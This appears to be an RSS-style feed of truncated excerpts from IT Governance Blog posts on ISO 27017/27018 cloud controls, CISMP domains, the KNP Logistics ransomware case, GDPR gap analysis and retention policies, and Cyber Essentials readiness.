Extending your ISMS to address Cloud security risks ISO 27001 sets out the specification for an ISMS (information security management system). But did you know you can extend your ISO 27001 ISMS to cover specific aspects of Cloud security? Let’s take a closer look at both ISO 27017 and ISO 27018. Note: The current versions of ISO 27017 and ISO 27018, ISO/IEC 27017:2015 and ISO/IEC 27018:2019, are aligned to the previous (2013) edition of ISO 27002. The ISO 27001:2022 standard completely reorganises the control set, adding 11 new controls, including 5.23: Information security for use of Cloud services. No old

The post What Are ISO 27017 and ISO 27018, and What Are Their Controls? appeared first on IT Governance Blog.

The 9 CISMP Domains Explained

The CISMP (Certificate in Information Security Management Principles) is one of the UK’s most widely recognised entry-level qualifications for information security professionals. Accredited by BCS, The Chartered Institute for IT, it provides a comprehensive foundation in cyber security and information security management. CISMP is designed for individuals working in, or aspiring to work in, security-related roles – particularly those seeking to progress into management or governance positions. It is also suitable for business professionals who need a broader understanding of information security as part of their wider operational responsibilities. It is frequently cited as the first step towards more advanced

The post The 9 CISMP Domains Explained appeared first on IT Governance Blog.

How One Weak Password Destroyed a 158-Year-Old Company

This evening’s episode of Panorama on BBC One, Fighting Cyber Criminals, examines the 2023 ransomware attack on KNP Logistics, as well as the recent attacks on Marks & Spencer, the Co-op and Harrods. KNP, a Northamptonshire haulage group that included the 158-year-old transport company Knights of Old, lost access to all its data after the Russian Akira group accessed an employee account by exploiting a weak password. Despite reportedly complying with industry standards and holding insurance against cyber attacks, the company couldn’t recover its data and entered administration. The BBC reported at the time that 730 employees would be made

The post How One Weak Password Destroyed a 158-Year-Old Company appeared first on IT Governance Blog.

Nine Steps to Conducting a GDPR Gap Analysis

A good way to start any compliance project is with a gap analysis to determine both where your current practices fall short of your obligations and where you should focus to bring them up to standard. When it comes to the UK GDPR (General Data Protection Regulation) and DPA (Data Protection Act) 2018, it’s also important to carry out gap analyses on a regular basis to ensure you continue to fulfil your legal obligations, especially when your data processing activities – and the personal data you process – change. Our GDPR Gap Analysis service uses our proprietary GDPR RADAR™ assessment

The post Nine Steps to Conducting a GDPR Gap Analysis appeared first on IT Governance Blog.

Are You Ready for Cyber Essentials?

IASME’s Cyber Essentials Readiness Tool and how it helps you prepare for certification Cyber Essentials is a UK government-backed certification scheme that helps organisations protect themselves from around 80% of common cyber threats. It’s widely recognised as a minimum standard for cyber security assurance and is often required in public-sector procurement contracts. The certification process is managed by IASME (the IASME Consortium), which licenses certification bodies – such as IT Governance Ltd – to carry out Cyber Essentials and Cyber Essentials Plus certifications. What is the Cyber Essentials Readiness Tool? The Cyber Essentials Readiness Tool, developed by IASME on behalf

The post Are You Ready for Cyber Essentials? appeared first on IT Governance Blog.

How to Write a GDPR Data Retention Policy – with template

Under the GDPR (General Data Protection Regulation), organisations must create a data retention policy to help them manage the way they handle personal information. But how long can you keep personal data for? If you keep sensitive data for too long – even if it’s being held securely and not being misused – you may still be violating the Regulation’s requirements. That might sound strict, but there’s a good reason for it. In this blog, we explain why that’s the case, how data retention policies work and how you can create one in line with the GDPR’s data retention requirements.

The post How to Write a GDPR Data Retention Policy – with template appeared first on IT Governance Blog.
